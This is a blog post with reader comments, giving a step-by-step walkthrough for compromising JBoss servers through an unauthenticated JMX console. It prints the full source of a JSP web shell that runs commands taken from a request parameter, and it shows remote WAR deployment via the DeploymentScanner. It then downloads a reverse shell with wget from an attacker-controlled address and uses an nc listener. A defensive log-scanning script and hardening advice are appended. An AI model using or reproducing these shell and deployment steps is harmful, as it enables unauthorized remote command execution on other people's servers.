Saturday, 19 February 2011
How to hack ANY version of JBOSS
Hi everyone, in this post I will explain how to hack ANY version of JBOSS and get root on the target machine.
1) Browse to the target machine: http://mytargettest.com:8080
2) Click on JMX-CONSOLE. If you can see the page without being asked for credentials, the console is exposed and you can continue.
3) Now you need to create a WAR file containing the shell.
3.1) mkdir WEB-INF
3.2) vi cmd.jsp and insert this:
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
3.3) vi WEB-INF/web.xml and insert this:
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
3.4) Now package it as a WAR (the JSP itself is compiled by the server the first time it is requested): jar cvf cmd.war WEB-INF cmd.jsp
3.5) Put this file on a web server you control; the target machine will download it from there in the next step.
4) Now browse to http://mytargettest.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
5) Search the page for the operation "void addURL()".
6) Insert the address of your war file, in my case http://172.16.1.79/exploits/cmd.war, and click INVOKE.
7) It will take about 1 min for the deployment scanner to pick up the WAR; then you can browse to your application at http://mytargettest.com:8080/cmd/cmd.jsp
8) Now you just need to type commands such as "id". Commands run as the user the JBoss process runs as; if that is not root, you need to find an exploit to root the machine.
9) Meanwhile you can get a shell on the machine by doing this:
10) Download a reverse shell to the machine: wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell
11) chmod +x /tmp/airwolf_reverse_shell
12) Prepare your pentest machine to receive the reverse shell: nc -l -p 8080 -vvv
13) Run the reverse shell on the target machine: /tmp/airwolf_reverse_shell
14) You are now connected to the server.
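From the defender's side, the walkthrough above leaves two clear traces in the JBoss HTTP access log: requests to /jmx-console/ (the DeploymentScanner MBean page and the HtmlAdaptor POST that INVOKE sends), and the deployed cmd.jsp being called with a cmd parameter. The following is an added example, not code from the post, that flags both in AccessLogValve common-format lines; the log lines are constructed for the example and the regex assumes that format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not from the post) in Tomcat/JBoss AccessLogValve common format.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Feb/2011:10:01:02 +0000] "GET /jmx-console/ HTTP/1.1" 200 3122
10.0.0.5 - - [19/Feb/2011:10:01:20 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 9871
10.0.0.5 - - [19/Feb/2011:10:01:35 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 412
10.0.0.5 - - [19/Feb/2011:10:02:50 +0000] "GET /cmd/cmd.jsp?cmd=id HTTP/1.1" 200 233
10.0.0.9 - - [19/Feb/2011:10:03:00 +0000] "GET /shop/index.jsp HTTP/1.1" 200 5120
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')

def classify(method, target):
    """Return the alert reasons for one request, or [] if it looks benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = parse_qs(parts.query)
    reasons = []
    if path.startswith("/jmx-console/"):
        reasons.append("jmx-console access")  # a reachable console is a finding in itself
        if "deploymentscanner" in parts.query.lower():
            reasons.append("DeploymentScanner MBean inspected")
        if method == "POST" and path.endswith("/htmladaptor"):
            # clicking INVOKE on an operation such as addURL submits a POST
            reasons.append("MBean operation invoked via HtmlAdaptor")
    if path.endswith(".jsp") and "cmd" in query:
        # the deployed cmd.jsp takes its shell command from ?cmd=
        reasons.append("JSP called with a 'cmd' parameter (web shell pattern)")
    return reasons

def scan(log_text):
    """Return (ip, method, target, reasons) for every suspicious log line."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected format; skip
        reasons = classify(m["method"], m["target"])
        if reasons:
            alerts.append((m["ip"], m["method"], m["target"], reasons))
    return alerts

if __name__ == "__main__":
    for ip, method, target, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {method} {target} -> {'; '.join(reasons)}")
```

On the server side the matching fix is to remove the jmx-console deployment or to protect it with a security-constraint backed by a JBoss security domain, so that the first alert never fires for an unauthenticated client.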
Thanks for watching.
excellent article
I'm trying to compile the files but I cannot; could you send the file to my email?
cmd.war??
Hello, please post here the error that you are getting, maybe others are facing the same problem, then I can help you and others at the same time.
Thanks for the comment.
nice work!!
It reminded me of this attack: http://www.youtube.com/watch?v=yghiC_U2RaM
It includes this, privilege elevation and a reverse shell XD
regards..
Hi!
I was trying to do this.
I compiled the WAR with no problems, I called addURL with the URL, and it says
Operation completed successfully without a return value!
But then I go to the URL and
HTTP Status 404 - /cmd/cmd.jsp
type Status report
message /cmd/cmd.jsp
description The requested resource (/cmd/cmd.jsp) is not available.
What am I doing wrong?
airwolf_reverse_shell ??
payload ??
and another required files ??
can you mail me ??
I'm surprised how much effort you put into creating such a great, informative website.
locate zecmd
I need to find deleted and erased files on my phone from February 1 to April 20 of 2020